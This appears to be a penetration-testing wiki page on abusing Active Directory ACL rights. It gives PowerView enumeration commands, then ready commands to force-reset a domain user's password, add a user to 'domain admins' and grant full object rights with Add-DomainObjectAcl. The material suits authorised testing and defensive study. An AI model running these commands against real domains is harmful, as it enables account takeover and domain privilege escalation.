ACLs/ACEs
Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc).
Some of the Active Directory object permissions and types that we as attackers are interested in:
GenericAll - full rights to the object (add users to a group or reset user's password)
GenericWrite - update object's attributes (i.e logon script)
WriteOwner - change object owner to attacker controlled user take over the object
WriteDACL - modify object's ACEs and give attacker full control right over the object
AllExtendedRights - ability to add user to a group or reset password
ForceChangePassword - ability to change user's password
Self (Self-Membership) - ability to add yourself to a group
Enumerate with powerview
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")){$_}}
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")){$_}}
The picture above is the example of enumerating ACLs in the Active Directory, here is the explaination:
Object (User) target.
The user that have access to that object
The access tipe is "GenericAll" mean to excessive.
GenericAll
Exploit with reset password
(GenericAll, ForceChangePassword, AllExtendedRight)
# user (force change password)
net user <username> <password> /domain
Add user to Group
(GenericAll, GenericWrite)
# group --> domain admin (force add member to domain admin)
net group "domain admins" <username> /add /domain
WriteDACL
# force apply generic all to the target username for current user
Add-DomainObjectAcl -TargetIdentity <target username> -PrincipalIdentity <current user> -Rights All
Reference:
Last updated